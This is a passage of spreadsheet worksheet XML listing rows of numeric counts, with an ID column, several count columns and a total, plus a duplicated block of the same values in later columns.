        <v>4</v>
      </c>
      <c r="Q1169" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1170" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1170" s="7">
        <v>4875</v>
      </c>
      <c r="B1170" s="8">
        <v>24</v>
      </c>
      <c r="C1170" s="8">
        <v>0</v>
      </c>
      <c r="D1170" s="8">
        <v>4</v>
      </c>
      <c r="E1170" s="8">
        <v>2</v>
      </c>
      <c r="F1170" s="8">
        <v>7</v>
      </c>
      <c r="G1170" s="8">
        <v>4</v>
      </c>
      <c r="H1170" s="8">
        <v>41</v>
      </c>
      <c r="K1170" s="7">
        <v>4875</v>
      </c>
      <c r="L1170" s="8">
        <v>24</v>
      </c>
      <c r="M1170" s="8">
        <v>0</v>
      </c>
      <c r="N1170" s="8">
        <v>4</v>
      </c>
      <c r="O1170" s="8">
        <v>2</v>
      </c>
      <c r="P1170" s="8">
        <v>7</v>
      </c>
      <c r="Q1170" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1171" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1171" s="7">
        <v>4876</v>
      </c>
      <c r="B1171" s="8">
        <v>6</v>
      </c>
      <c r="C1171" s="8">
        <v>1</v>
      </c>
      <c r="D1171" s="8">
        <v>8</v>
      </c>
      <c r="E1171" s="8">
        <v>0</v>
      </c>
      <c r="F1171" s="8">
        <v>6</v>
      </c>
      <c r="G1171" s="8">
        <v>0</v>
      </c>
      <c r="H1171" s="8">
        <v>21</v>
      </c>
      <c r="K1171" s="7">
        <v>4876</v>
      </c>
      <c r="L1171" s="8">
        <v>6</v>
      </c>
      <c r="M1171" s="8">
        <v>1</v>
      </c>
      <c r="N1171" s="8">
        <v>8</v>
      </c>
      <c r="O1171" s="8">
        <v>0</v>
      </c>
      <c r="P1171" s="8">
        <v>6</v>
      </c>
      <c r="Q1171" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1172" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1172" s="7">
        <v>4878</v>
      </c>
      <c r="B1172" s="8">
        <v>25</v>
      </c>
      <c r="C1172" s="8">
        <v>0</v>
      </c>
      <c r="D1172" s="8">
        <v>45</v>
      </c>
      <c r="E1172" s="8">
        <v>5</v>
      </c>
      <c r="F1172" s="8">
        <v>2</v>
      </c>
      <c r="G1172" s="8">
        <v>0</v>
      </c>
      <c r="H1172" s="8">
        <v>77</v>
      </c>
      <c r="K1172" s="7">
        <v>4878</v>
      </c>
      <c r="L1172" s="8">
        <v>25</v>
      </c>
      <c r="M1172" s="8">
        <v>0</v>
      </c>
      <c r="N1172" s="8">
        <v>45</v>
      </c>
      <c r="O1172" s="8">
        <v>5</v>
      </c>
      <c r="P1172" s="8">
        <v>2</v>
      </c>
      <c r="Q1172" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1173" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1173" s="7">
        <v>4879</v>
      </c>
      <c r="B1173" s="8">
        <v>0</v>
      </c>
      <c r="C1173" s="8">
        <v>0</v>
      </c>
      <c r="D1173" s="8">
        <v>40</v>
      </c>
      <c r="E1173" s="8">
        <v>19</v>
      </c>
      <c r="F1173" s="8">
        <v>18</v>
      </c>
      <c r="G1173" s="8">
        <v>3</v>
      </c>
      <c r="H1173" s="8">
        <v>80</v>
      </c>
      <c r="K1173" s="7">
        <v>4879</v>
      </c>
      <c r="L1173" s="8">
        <v>0</v>
      </c>
      <c r="M1173" s="8">
        <v>0</v>
      </c>
      <c r="N1173" s="8">
        <v>40</v>
      </c>
      <c r="O1173" s="8">
        <v>19</v>
      </c>
      <c r="P1173" s="8">
        <v>18</v>
      </c>
      <c r="Q1173" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1174" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1174" s="7">
        <v>4880</v>
      </c>
      <c r="B1174" s="8">
        <v>6</v>
      </c>
      <c r="C1174" s="8">
        <v>1</v>
      </c>
      <c r="D1174" s="8">
        <v>0</v>
      </c>
      <c r="E1174" s="8">
        <v>0</v>
      </c>
      <c r="F1174" s="8">
        <v>1</v>
      </c>
      <c r="G1174" s="8">
        <v>1</v>
      </c>
      <c r="H1174" s="8">
        <v>9</v>
      </c>
      <c r="K1174" s="7">
        <v>4880</v>
      </c>
      <c r="L1174" s="8">
        <v>6</v>
      </c>
      <c r="M1174" s="8">
        <v>1</v>
      </c>
      <c r="N1174" s="8">
        <v>0</v>
      </c>
      <c r="O1174" s="8">
        <v>0</v>
      </c>
      <c r="P1174" s="8">
        <v>1</v>
      </c>
      <c r="Q1174" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1175" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1175" s="7">
        <v>4881</v>
      </c>
      <c r="B1175" s="8">
        <v>6</v>
      </c>
      <c r="C1175" s="8">
        <v>1</v>
      </c>
      <c r="D1175" s="8">
        <v>0</v>
      </c>
      <c r="E1175" s="8">
        <v>5</v>
      </c>
      <c r="F1175" s="8">
        <v>0</v>
      </c>
      <c r="G1175" s="8">
        <v>5</v>
      </c>
      <c r="H1175" s="8">
        <v>17</v>
      </c>
      <c r="K1175" s="7">
        <v>4881</v>
      </c>
      <c r="L1175" s="8">
        <v>6</v>
      </c>
      <c r="M1175" s="8">
        <v>1</v>
      </c>
      <c r="N1175" s="8">
        <v>0</v>
      </c>
      <c r="O1175" s="8">
        <v>5</v>
      </c>
      <c r="P1175" s="8">
        <v>0</v>
      </c>
      <c r="Q1175" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1176" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1176" s="7">
        <v>4882</v>
      </c>
      <c r="B1176" s="8">
        <v>24</v>
      </c>
      <c r="C1176" s="8">
        <v>1</v>
      </c>
      <c r="D1176" s="8">
        <v>0</v>
      </c>
      <c r="E1176" s="8">
        <v>0</v>
      </c>
      <c r="F1176" s="8">
        <v>5</v>
      </c>
      <c r="G1176" s="8">
        <v>0</v>
      </c>
      <c r="H1176" s="8">
        <v>30</v>
      </c>
      <c r="K1176" s="7">
        <v>4882</v>
      </c>
      <c r="L1176" s="8">
        <v>24</v>
      </c>
      <c r="M1176" s="8">
        <v>1</v>
      </c>
      <c r="N1176" s="8">
        <v>0</v>
      </c>
      <c r="O1176" s="8">
        <v>0</v>
      </c>
      <c r="P1176" s="8">
        <v>5</v>
      </c>
      <c r="Q1176" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1177" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1177" s="7">
        <v>4885</v>
      </c>
      <c r="B1177" s="8">
        <v>22</v>
      </c>
      <c r="C1177" s="8">
        <v>1</v>
      </c>
      <c r="D1177" s="8">
        <v>0</v>
      </c>
      <c r="E1177" s="8">
        <v>0</v>
      </c>
      <c r="F1177" s="8">
        <v>10</v>
      </c>
      <c r="G1177" s="8">
        <v>0</v>
      </c>
      <c r="H1177" s="8">
        <v>33</v>
      </c>
      <c r="K1177" s="7">
        <v>4885</v>
      </c>
      <c r="L1177" s="8">
        <v>22</v>
      </c>
      <c r="M1177" s="8">
        <v>1</v>
      </c>
      <c r="N1177" s="8">
        <v>0</v>
      </c>
      <c r="O1177" s="8">
        <v>0</v>
      </c>
      <c r="P1177" s="8">
        <v>10</v>
      </c>
      <c r="Q1177" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1178" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1178" s="7">
        <v>4887</v>
      </c>
      <c r="B1178" s="8">
        <v>25</v>
      </c>
      <c r="C1178" s="8">
        <v>1</v>
      </c>
      <c r="D1178" s="8">
        <v>6</v>
      </c>
      <c r="E1178" s="8">
        <v>0</v>
      </c>
      <c r="F1178" s="8">
        <v>6</v>
      </c>
      <c r="G1178" s="8">
        <v>0</v>
      </c>
      <c r="H1178" s="8">
        <v>38</v>
      </c>
      <c r="K1178" s="7">
        <v>4887</v>
      </c>
      <c r="L1178" s="8">
        <v>25</v>
      </c>
      <c r="M1178" s="8">
        <v>1</v>
      </c>
      <c r="N1178" s="8">
        <v>6</v>
      </c>
      <c r="O1178" s="8">
        <v>0</v>
      </c>
      <c r="P1178" s="8">
        <v>6</v>
      </c>
      <c r="Q1178" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1179" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1179" s="7">
        <v>4888</v>
      </c>
      <c r="B1179" s="8">
        <v>365</v>
      </c>
      <c r="C1179" s="8">
        <v>1</v>
      </c>
      <c r="D1179" s="8">
        <v>5</v>
      </c>
      <c r="E1179" s="8">
        <v>10</v>
      </c>
      <c r="F1179" s="8">
        <v>5</v>
      </c>
      <c r="G1179" s="8">
        <v>6</v>
      </c>
      <c r="H1179" s="8">
        <v>392</v>
      </c>
      <c r="K1179" s="7">
        <v>4888</v>
      </c>
      <c r="L1179" s="8">
        <v>365</v>
      </c>
      <c r="M1179" s="8">
        <v>1</v>
      </c>
      <c r="N1179" s="8">
        <v>5</v>
      </c>
      <c r="O1179" s="8">
        <v>10</v>
      </c>
      <c r="P1179" s="8">
        <v>5</v>
      </c>
      <c r="Q1179" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="1180" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1180" s="7">
        <v>4889</v>
      </c>
      <c r="B1180" s="8">
        <v>24</v>
      </c>
      <c r="C1180" s="8">
        <v>0</v>
      </c>
      <c r="D1180" s="8">
        <v>10</v>
      </c>
      <c r="E1180" s="8">
        <v>0</v>
      </c>
      <c r="F1180" s="8">
        <v>2</v>
      </c>
      <c r="G1180" s="8">
        <v>4</v>
      </c>
      <c r="H1180" s="8">
        <v>40</v>
      </c>
      <c r="K1180" s="7">
        <v>4889</v>
      </c>
      <c r="L1180" s="8">
        <v>24</v>
      </c>
      <c r="M1180" s="8">
        <v>0</v>
      </c>
      <c r="N1180" s="8">
        <v>10</v>
      </c>
      <c r="O1180" s="8">
        <v>0</v>
      </c>
      <c r="P1180" s="8">
        <v>2</v>
      </c>
      <c r="Q1180" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1181" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1181" s="7">
        <v>4892</v>
      </c>
      <c r="B1181" s="8">
        <v>22</v>
      </c>
      <c r="C1181" s="8">
        <v>1</v>
      </c>
      <c r="D1181" s="8">
        <v>2</v>
      </c>
      <c r="E1181" s="8">
        <v>2</v>
      </c>
      <c r="F1181" s="8">
        <v>3</v>
      </c>
      <c r="G1181" s="8">
        <v>2</v>
      </c>
      <c r="H1181" s="8">
        <v>32</v>
      </c>
      <c r="K1181" s="7">
        <v>4892</v>
      </c>
      <c r="L1181" s="8">
        <v>22</v>
      </c>
      <c r="M1181" s="8">
        <v>1</v>
      </c>
      <c r="N1181" s="8">
        <v>2</v>
      </c>
      <c r="O1181" s="8">
        <v>2</v>
      </c>
      <c r="P1181" s="8">
        <v>3</v>
      </c>
      <c r="Q1181" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1182" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1182" s="7">
        <v>4898</v>
      </c>
      <c r="B1182" s="8">
        <v>0</v>
      </c>
      <c r="C1182" s="8">
        <v>0</v>
      </c>
      <c r="D1182" s="8">
        <v>0</v>
      </c>
      <c r="E1182" s="8">
        <v>0</v>
      </c>
      <c r="F1182" s="8">
        <v>15</v>
      </c>
      <c r="G1182" s="8">
        <v>1</v>
      </c>
      <c r="H1182" s="8">
        <v>16</v>
      </c>
      <c r="K1182" s="7">
        <v>4898</v>
      </c>
      <c r="L1182" s="8">
        <v>0</v>
      </c>
      <c r="M1182" s="8">
        <v>0</v>
      </c>
      <c r="N1182" s="8">
        <v>0</v>
      </c>
      <c r="O1182" s="8">
        <v>0</v>
      </c>
      <c r="P1182" s="8">
        <v>15</v>
      </c>
      <c r="Q1182" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1183" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1183" s="7">
        <v>4899</v>
      </c>
      <c r="B1183" s="8">
        <v>24</v>
      </c>
      <c r="C1183" s="8">
        <v>0</v>
      </c>
      <c r="D1183" s="8">
        <v>0</v>
      </c>
      <c r="E1183" s="8">
        <v>0</v>
      </c>
      <c r="F1183" s="8">
        <v>19</v>
      </c>
      <c r="G1183" s="8">
        <v>4</v>
      </c>
      <c r="H1183" s="8">
        <v>47</v>
      </c>
      <c r="K1183" s="7">
        <v>4899</v>
      </c>
      <c r="L1183" s="8">
        <v>24</v>
      </c>
      <c r="M1183" s="8">
        <v>0</v>
      </c>
      <c r="N1183" s="8">
        <v>0</v>
      </c>
      <c r="O1183" s="8">
        <v>0</v>
      </c>
      <c r="P1183" s="8">
        <v>19</v>
      </c>
      <c r="Q1183" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1184" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1184" s="7">
        <v>4901</v>
      </c>
      <c r="B1184" s="8">
        <v>31</v>
      </c>
      <c r="C1184" s="8">
        <v>1</v>
      </c>
      <c r="D1184" s="8">
        <v>20</v>
      </c>
      <c r="E1184" s="8">
        <v>2</v>
      </c>
      <c r="F1184" s="8">
        <v>0</v>
      </c>
      <c r="G1184" s="8">
        <v>0</v>
      </c>
      <c r="H1184" s="8">
        <v>54</v>
      </c>
      <c r="K1184" s="7">
        <v>4901</v>
      </c>
      <c r="L1184" s="8">
        <v>31</v>
      </c>
      <c r="M1184" s="8">
        <v>1</v>
      </c>
      <c r="N1184" s="8">
        <v>20</v>
      </c>
      <c r="O1184" s="8">
        <v>2</v>
      </c>
      <c r="P1184" s="8">
        <v>0</v>
      </c>
      <c r="Q1184" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1185" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1185" s="7">
        <v>4902</v>
      </c>
      <c r="B1185" s="8">
        <v>5</v>
      </c>
      <c r="C1185" s="8">
        <v>1</v>
      </c>
      <c r="D1185" s="8">
        <v>0</v>
      </c>
      <c r="E1185" s="8">
        <v>2</v>
      </c>
      <c r="F1185" s="8">
        <v>0</v>
      </c>
      <c r="G1185" s="8">
        <v>4</v>
      </c>
      <c r="H1185" s="8">
        <v>12</v>
      </c>
      <c r="K1185" s="7">
        <v>4902</v>
      </c>
      <c r="L1185" s="8">
        <v>5</v>
      </c>
      <c r="M1185" s="8">
        <v>1</v>
      </c>
      <c r="N1185" s="8">
        <v>0</v>
      </c>
      <c r="O1185" s="8">
        <v>2</v>
      </c>
      <c r="P1185" s="8">
        <v>0</v>
      </c>
      <c r="Q1185" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1186" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1186" s="7">
        <v>4903</v>
      </c>
      <c r="B1186" s="8">
        <v>26</v>
      </c>
      <c r="C1186" s="8">
        <v>0</v>
      </c>
      <c r="D1186" s="8">
        <v>2</v>
      </c>
      <c r="E1186" s="8">
        <v>0</v>
      </c>
      <c r="F1186" s="8">
        <v>3</v>
      </c>
      <c r="G1186" s="8">
        <v>1</v>
      </c>
      <c r="H1186" s="8">
        <v>32</v>
      </c>
      <c r="K1186" s="7">
        <v>4903</v>
      </c>
      <c r="L1186" s="8">
        <v>26</v>
      </c>
      <c r="M1186" s="8">
        <v>0</v>
      </c>
      <c r="N1186" s="8">
        <v>2</v>
      </c>
      <c r="O1186" s="8">
        <v>0</v>
      </c>
      <c r="P1186" s="8">
        <v>3</v>
      </c>
      <c r="Q1186" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1187" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1187" s="7">
        <v>4904</v>
      </c>
      <c r="B1187" s="8">
        <v>20</v>
      </c>
      <c r="C1187" s="8">
        <v>2</v>
      </c>
      <c r="D1187" s="8">
        <v>32</v>
      </c>
      <c r="E1187" s="8">
        <v>10</v>
      </c>
      <c r="F1187" s="8">
        <v>36</v>
      </c>
      <c r="G1187" s="8">
        <v>4</v>
      </c>
      <c r="H1187" s="8">
        <v>104</v>
      </c>
      <c r="K1187" s="7">
        <v>4904</v>
      </c>
      <c r="L1187" s="8">
        <v>20</v>
      </c>
      <c r="M1187" s="8">
        <v>2</v>
      </c>
      <c r="N1187" s="8">
        <v>32</v>
      </c>
      <c r="O1187" s="8">
        <v>10</v>
      </c>
      <c r="P1187" s="8">
        <v>36</v>
      </c>
      <c r="Q1187" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1188" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1188" s="7">
        <v>4906</v>
      </c>
      <c r="B1188" s="8">
        <v>26</v>
      </c>
      <c r="C1188" s="8">
        <v>1</v>
      </c>
      <c r="D1188" s="8">
        <v>7</v>
      </c>
      <c r="E1188" s="8">
        <v>15</v>
      </c>
      <c r="F1188" s="8">
        <v>2</v>
      </c>
      <c r="G1188" s="8">
        <v>8</v>
      </c>
      <c r="H1188" s="8">
        <v>59</v>
      </c>
      <c r="K1188" s="7">
        <v>4906</v>
      </c>
      <c r="L1188" s="8">
        <v>26</v>
      </c>
      <c r="M1188" s="8">
        <v>1</v>
      </c>
      <c r="N1188" s="8">
        <v>7</v>
      </c>
      <c r="O1188" s="8">
        <v>15</v>
      </c>
      <c r="P1188" s="8">
        <v>2</v>
      </c>
      <c r="Q1188" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="1189" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1189" s="7">
        <v>4908</v>
      </c>
      <c r="B1189" s="8">
        <v>30</v>
      </c>
      <c r="C1189" s="8">
        <v>0</v>
      </c>
      <c r="D1189" s="8">
        <v>14</v>
      </c>
      <c r="E1189" s="8">
        <v>16</v>
      </c>
      <c r="F1189" s="8">
        <v>3</v>
      </c>
      <c r="G1189" s="8">
        <v>3</v>
      </c>
      <c r="H1189" s="8">
        <v>66</v>
      </c>
      <c r="K1189" s="7">
        <v>4908</v>
      </c>
      <c r="L1189" s="8">
        <v>30</v>
      </c>
      <c r="M1189" s="8">
        <v>0</v>
      </c>
      <c r="N1189" s="8">
        <v>14</v>
      </c>
      <c r="O1189" s="8">
        <v>16</v>
      </c>
      <c r="P1189" s="8">
        <v>3</v>
      </c>
      <c r="Q1189" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1190" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1190" s="7">
        <v>4909</v>
      </c>
      <c r="B1190" s="8">
        <v>25</v>
      </c>
      <c r="C1190" s="8">
        <v>0</v>
      </c>
      <c r="D1190" s="8">
        <v>15</v>
      </c>
      <c r="E1190" s="8">
        <v>10</v>
      </c>
      <c r="F1190" s="8">
        <v>7</v>
      </c>
      <c r="G1190" s="8">
        <v>3</v>
      </c>
      <c r="H1190" s="8">
        <v>60</v>
      </c>
      <c r="K1190" s="7">
        <v>4909</v>
      </c>
      <c r="L1190" s="8">
        <v>25</v>
      </c>
      <c r="M1190" s="8">
        <v>0</v>
      </c>
      <c r="N1190" s="8">
        <v>15</v>
      </c>
      <c r="O1190" s="8">
        <v>10</v>
      </c>
      <c r="P1190" s="8">
        <v>7</v>
      </c>
      <c r="Q1190" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1191" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1191" s="7">
        <v>4911</v>
      </c>
      <c r="B1191" s="8">
        <v>54</v>
      </c>
      <c r="C1191" s="8">
        <v>1</v>
      </c>
      <c r="D1191" s="8">
        <v>0</v>
      </c>
      <c r="E1191" s="8">
        <v>0</v>
      </c>
      <c r="F1191" s="8">
        <v>22</v>
      </c>
      <c r="G1191" s="8">
        <v>5</v>
      </c>
      <c r="H1191" s="8">
        <v>82</v>
      </c>
      <c r="K1191" s="7">
        <v>4911</v>
      </c>
      <c r="L1191" s="8">
        <v>54</v>
      </c>
      <c r="M1191" s="8">
        <v>1</v>
      </c>
      <c r="N1191" s="8">
        <v>0</v>
      </c>
      <c r="O1191" s="8">
        <v>0</v>
      </c>
      <c r="P1191" s="8">
        <v>22</v>
      </c>
      <c r="Q1191" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1192" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1192" s="7">
        <v>4913</v>
      </c>
      <c r="B1192" s="8">
        <v>20</v>
      </c>
      <c r="C1192" s="8">
        <v>1</v>
      </c>
      <c r="D1192" s="8">
        <v>4</v>
      </c>
      <c r="E1192" s="8">
        <v>0</v>
      </c>
      <c r="F1192" s="8">
        <v>4</v>
      </c>
      <c r="G1192" s="8">
        <v>3</v>
      </c>
      <c r="H1192" s="8">
        <v>32</v>
      </c>
      <c r="K1192" s="7">
        <v>4913</v>
      </c>
      <c r="L1192" s="8">
        <v>20</v>
      </c>
      <c r="M1192" s="8">
        <v>1</v>
      </c>
      <c r="N1192" s="8">
        <v>4</v>
      </c>
      <c r="O1192" s="8">
        <v>0</v>
      </c>
      <c r="P1192" s="8">
        <v>4</v>
      </c>
      <c r="Q1192" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1193" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1193" s="7">
        <v>4915</v>
      </c>
      <c r="B1193" s="8">
        <v>21</v>
      </c>
      <c r="C1193" s="8">
        <v>1</v>
      </c>
      <c r="D1193" s="8">
        <v>0</v>
      </c>
      <c r="E1193" s="8">
        <v>4</v>
      </c>
      <c r="F1193" s="8">
        <v>4</v>
      </c>
      <c r="G1193" s="8">
        <v>0</v>
      </c>
      <c r="H1193" s="8">
        <v>30</v>
      </c>
      <c r="K1193" s="7">
        <v>4915</v>
      </c>
      <c r="L1193" s="8">
        <v>21</v>
      </c>
      <c r="M1193" s="8">
        <v>1</v>
      </c>
      <c r="N1193" s="8">
        <v>0</v>
      </c>
      <c r="O1193" s="8">
        <v>4</v>
      </c>
      <c r="P1193" s="8">
        <v>4</v>
      </c>
      <c r="Q1193" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1194" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1194" s="7">
        <v>4916</v>
      </c>
      <c r="B1194" s="8">
        <v>6</v>
      </c>
      <c r="C1194" s="8">
        <v>1</v>
      </c>
      <c r="D1194" s="8">
        <v>2</v>
      </c>
      <c r="E1194" s="8">
        <v>1</v>
      </c>
      <c r="F1194" s="8">
        <v>2</v>
      </c>
      <c r="G1194" s="8">
        <v>2</v>
      </c>
      <c r="H1194" s="8">
        <v>14</v>
      </c>
      <c r="K1194" s="7">
        <v>4916</v>
      </c>
      <c r="L1194" s="8">
        <v>6</v>
      </c>
      <c r="M1194" s="8">
        <v>1</v>
      </c>
      <c r="N1194" s="8">
        <v>2</v>
      </c>
      <c r="O1194" s="8">
        <v>1</v>
      </c>
      <c r="P1194" s="8">
        <v>2</v>
      </c>
      <c r="Q1194" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1195" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1195" s="7">
        <v>4919</v>
      </c>
      <c r="B1195" s="8">
        <v>6</v>
      </c>
      <c r="C1195" s="8">
        <v>3</v>
      </c>
      <c r="D1195" s="8">
        <v>15</v>
      </c>
      <c r="E1195" s="8">
        <v>15</v>
      </c>
      <c r="F1195" s="8">
        <v>7</v>
      </c>
      <c r="G1195" s="8">
        <v>1</v>
      </c>
      <c r="H1195" s="8">
        <v>47</v>
      </c>
      <c r="K1195" s="7">
        <v>4919</v>
      </c>
      <c r="L1195" s="8">
        <v>6</v>
      </c>
      <c r="M1195" s="8">
        <v>3</v>
      </c>
      <c r="N1195" s="8">
        <v>15</v>
      </c>
      <c r="O1195" s="8">
        <v>15</v>
      </c>
      <c r="P1195" s="8">
        <v>7</v>
      </c>
      <c r="Q1195" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1196" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1196" s="7">
        <v>4921</v>
      </c>
      <c r="B1196" s="8">
        <v>25</v>
      </c>
      <c r="C1196" s="8">
        <v>0</v>
      </c>
      <c r="D1196" s="8">
        <v>15</v>
      </c>
      <c r="E1196" s="8">
        <v>0</v>
      </c>
      <c r="F1196" s="8">
        <v>3</v>
      </c>
      <c r="G1196" s="8">
        <v>0</v>
      </c>
      <c r="H1196" s="8">
        <v>43</v>
      </c>
      <c r="K1196" s="7">
        <v>4921</v>
      </c>
      <c r="L1196" s="8">
        <v>25</v>
      </c>
      <c r="M1196" s="8">
        <v>0</v>
      </c>
      <c r="N1196" s="8">
        <v>15</v>
      </c>
      <c r="O1196" s="8">
        <v>0</v>
      </c>
      <c r="P1196" s="8">
        <v>3</v>
      </c>
      <c r="Q1196" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1197" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1197" s="7">
        <v>4922</v>
      </c>
      <c r="B1197" s="8">
        <v>20</v>
      </c>
      <c r="C1197" s="8">
        <v>1</v>
      </c>
      <c r="D1197" s="8">
        <v>0</v>
      </c>
      <c r="E1197" s="8">
        <v>0</v>
      </c>
      <c r="F1197" s="8">
        <v>4</v>
      </c>
      <c r="G1197" s="8">
        <v>1</v>
      </c>
      <c r="H1197" s="8">
        <v>26</v>
      </c>
      <c r="K1197" s="7">
        <v>4922</v>
      </c>
      <c r="L1197" s="8">
        <v>20</v>
      </c>
      <c r="M1197" s="8">
        <v>1</v>
      </c>
      <c r="N1197" s="8">
        <v>0</v>
      </c>
      <c r="O1197" s="8">
        <v>0</v>
      </c>
      <c r="P1197" s="8">
        <v>4</v>
      </c>
      <c r="Q1197" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1198" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1198" s="7">
        <v>4923</v>
      </c>
      <c r="B1198" s="8">
        <v>20</v>
      </c>
      <c r="C1198" s="8">
        <v>1</v>
      </c>
      <c r="D1198" s="8">
        <v>2</v>
      </c>
      <c r="E1198" s="8">
        <v>0</v>
      </c>
      <c r="F1198" s="8">
        <v>4</v>
      </c>
      <c r="G1198" s="8">
        <v>2</v>
      </c>
      <c r="H1198" s="8">
        <v>29</v>
      </c>
      <c r="K1198" s="7">
        <v>4923</v>
      </c>
      <c r="L1198" s="8">
        <v>20</v>
      </c>
      <c r="M1198" s="8">
        <v>1</v>
      </c>
      <c r="N1198" s="8">
        <v>2</v>
      </c>
      <c r="O1198" s="8">
        <v>0</v>
      </c>
      <c r="P1198" s="8">
        <v>4</v>
      </c>
      <c r="Q1198" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1199" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1199" s="7">
        <v>4925</v>
      </c>
      <c r="B1199" s="8">
        <v>20</v>
      </c>
      <c r="C1199" s="8">
        <v>2</v>
      </c>
      <c r="D1199" s="8">
        <v>10</v>
      </c>
      <c r="E1199" s="8">
        <v>5</v>
      </c>
      <c r="F1199" s="8">
        <v>7</v>
      </c>
      <c r="G1199" s="8">
        <v>5</v>
      </c>
      <c r="H1199" s="8">
        <v>49</v>
      </c>
      <c r="K1199" s="7">
        <v>4925</v>
      </c>
      <c r="L1199" s="8">
        <v>20</v>
      </c>
      <c r="M1199" s="8">
        <v>2</v>
      </c>
      <c r="N1199" s="8">
        <v>10</v>
      </c>
      <c r="O1199" s="8">
        <v>5</v>
      </c>
      <c r="P1199" s="8">
        <v>7</v>
      </c>
      <c r="Q1199" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1200" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1200" s="7">
        <v>4934</v>
      </c>
      <c r="B1200" s="8">
        <v>24</v>
      </c>
      <c r="C1200" s="8">
        <v>8</v>
      </c>
      <c r="D1200" s="8">
        <v>1</v>
      </c>
      <c r="E1200" s="8">
        <v>2</v>
      </c>
      <c r="F1200" s="8">
        <v>2</v>
      </c>
      <c r="G1200" s="8">
        <v>13</v>
      </c>
      <c r="H1200" s="8">
        <v>50</v>
      </c>
      <c r="K1200" s="7">
        <v>4934</v>
      </c>
      <c r="L1200" s="8">
        <v>24</v>
      </c>
      <c r="M1200" s="8">
        <v>8</v>
      </c>
      <c r="N1200" s="8">
        <v>1</v>
      </c>
      <c r="O1200" s="8">
        <v>2</v>
      </c>
      <c r="P1200" s="8">
        <v>2</v>
      </c>
      <c r="Q1200" s="8">
        <v>13</v>
      </c>
    </row>
    <row r="1201" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1201" s="7">
        <v>4944</v>
      </c>
      <c r="B1201" s="8">
        <v>25</v>
      </c>
      <c r="C1201" s="8">
        <v>1</v>
      </c>
      <c r="D1201" s="8">
        <v>0</v>
      </c>
      <c r="E1201" s="8">
        <v>21</v>
      </c>
      <c r="F1201" s="8">
        <v>12</v>
      </c>
      <c r="G1201" s="8">
        <v>0</v>
      </c>
      <c r="H1201" s="8">
        <v>59</v>
      </c>
      <c r="K1201" s="7">
        <v>4944</v>
      </c>
      <c r="L1201" s="8">
        <v>25</v>
      </c>
      <c r="M1201" s="8">
        <v>1</v>
      </c>
      <c r="N1201" s="8">
        <v>0</v>
      </c>
      <c r="O1201" s="8">
        <v>21</v>
      </c>
      <c r="P1201" s="8">
        <v>12</v>
      </c>
      <c r="Q1201" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1202" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1202" s="7">
        <v>4945</v>
      </c>
      <c r="B1202" s="8">
        <v>25</v>
      </c>
      <c r="C1202" s="8">
        <v>0</v>
      </c>
      <c r="D1202" s="8">
        <v>43</v>
      </c>
      <c r="E1202" s="8">
        <v>55</v>
      </c>
      <c r="F1202" s="8">
        <v>20</v>
      </c>
      <c r="G1202" s="8">
        <v>24</v>
      </c>
      <c r="H1202" s="8">
        <v>167</v>
      </c>
